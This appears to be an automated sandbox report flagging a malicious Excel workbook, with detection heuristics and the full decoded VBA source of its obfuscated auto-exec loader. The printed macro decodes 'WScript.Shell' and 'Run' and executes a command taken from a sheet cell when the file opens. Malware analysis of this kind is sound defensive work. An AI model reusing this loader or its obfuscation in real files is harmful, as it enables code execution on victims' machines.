MALICIOUS
362
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Excel file contains heavily obfuscated VBA macros, including auto-executing Document_Open and Workbook_Open routines. The macros utilize CreateObject and CallByName to execute code, strongly suggesting the download and execution of a secondary payload. The presence of XLM macros further indicates a multi-stage attack. The specific strings used in the VBA functions, such as VBU_("B2AEBECDC4CBCF89AEC3C0C7C7") and VBU_("ADD0C9"), are likely deobfuscated commands or object names related to payload execution.
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-6700360-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6700360-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 229 bytes |
SHA-256: b07e9b3c0bc67a5abf1f3d5a279d12af20bcec7c89268c78faaa2dc946b3582d |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - MPro ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3034 bytes |
SHA-256: 771771d2729dad8fe594db16f5a51e7d0d794900c955bda807b09458ece4e560 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function GUCFVPHU() As String
D aGUCFVPHU As String
aGUCFVPHU = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myGUCFVPHU = aGUCFVPHU
DimDimMsgBox ((aGUCFVPHU & myGUCFVPHU, 28))
End Function
Public Sub WEG_()
Dim PUH_ As Object: Set PUH_ = CreateObject(VBU_("B2AEBECDC4CBCF89AEC3C0C7C7"))
CallByName PUH_, VBU_("ADD0C9"), VbMethod, VBU_(ThisWorkbook.Sheets("MProp").Range("J225").Value), 0, True
End Sub
Private Function TAMQPDHI() As String
D aTAMQPDHI As String
aTAMQPDHI = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myTAMQPDHI = aTAMQPDHI
DimDimMsgBox ((aTAMQPDHI & myTAMQPDHI, 28))
End Function
Sub D_()
WEG_
End Sub
Private Function FTVEBUHZ() As String
D aFTVEBUHZ As String
aFTVEBUHZ = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myFTVEBUHZ = aFTVEBUHZ
DimDimMsgBox ((aFTVEBUHZ & myFTVEBUHZ, 28))
End Function
Public Sub Document_Open()
Application.Run VBU_("9FBA")
End Sub
Private Function QXSIEBWR() As String
D aQXSIEBWR As String
aQXSIEBWR = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myQXSIEBWR = aQXSIEBWR
DimDimMsgBox ((aQXSIEBWR & myQXSIEBWR, 28))
End Function
Sub Workbook_Open()
D_
End Sub
Private Function SYYTZSXC() As String
D aSYYTZSXC As String
aSYYTZSXC = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim mySYYTZSXC = aSYYTZSXC
DimDimMsgBox ((aSYYTZSXC & mySYYTZSXC, 28))
End Function
Public Function VBU_(ByVal PUH_ As String)
Dim RUJ_ As String
Dim ULD_ As Long
For ULD_ = 1 To Len(PUH_) Step 2
Dim YW_ As Long: YW_ = CLng(Chr(38) & Chr(72) & Mid(PUH_, ULD_, 2))
RUJ_ = RUJ_ & Chr(YW_ - 91)
Next
VBU_ = RUJ_
End Function
Private Function COZIIHFD() As String
D aCOZIIHFD As String
aCOZIIHFD = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myCOZIIHFD = aCOZIIHFD
DimDimMsgBox ((aCOZIIHFD & myCOZIIHFD, 28))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.